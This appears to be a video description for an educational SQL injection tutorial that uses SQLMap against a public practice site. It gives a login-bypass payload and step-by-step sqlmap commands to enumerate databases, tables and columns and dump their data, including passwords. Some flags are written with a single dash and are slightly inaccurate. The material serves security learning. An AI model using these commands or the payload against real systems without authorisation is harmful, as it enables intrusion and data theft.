SQL injection attack using SQLMap || Roshan Kandel
ฝัง
- เผยแพร่เมื่อ 9 ม.ค. 2025
- Disclaimer: This is just a part of educational program.
Don't try this for unethical cause.
For our work, we are using vulnerable website that has been used for study purpose.
testphp.vulnweb... (Vulnerable Website)
hack-yourself-... (Another Vulnerable Website for practicing)
Try logging in with password: ' or '1'='1
Installing sqlmap
sudo apt-get install sqlmap
To look at the set of parameters that can be passed, type in the terminal,
sqlmap -h
Using SQLMAP to test a website for SQL Injection vulnerability:
Step 1: Determine the DBMS behind the Web Site
sqlmap -u "the entire URL of the vulnerable web page"
Note that the entire URL is enclosed in double quotation marks (").
You can also use crawl to check for vulnerability in depth
sqlmap -u "the entire URL of the vulnerable web page" --crawl 1/2/3/4/5 -threads 5
Step 2: List information about the existing databases
sqlmap -u testphp.vulnweb... --dbs
-dbs lists all the available databases.
Step 3: List information about Tables present in a particular Database
sqlmap -u testphp.vulnweb... -D acuart -tables
We now use -D to specify the name of the database that we wish to access, and once we have access to the database, we would want to see whether we can access the tables. For this, we use the -tables query.
Step 4: List information about the columns of a particular table
sqlmap -u testphp.vulnweb... -D acuart -T artists --columns
use -T to specify the table name, and -columns to query the column names.
Step 5: Dump the data from the columns
sqlmap -u testphp.vulnweb... -D acuart -T artists -C aname --dump
access the information in a specific column by using the following command, where -C can be used to specify multiple column name separated by a comma, and the -dump query retrieves the data
To crack the password and log in just enter -dump or -dump-all command
- batch: Never ask for user input, use the default behaviour
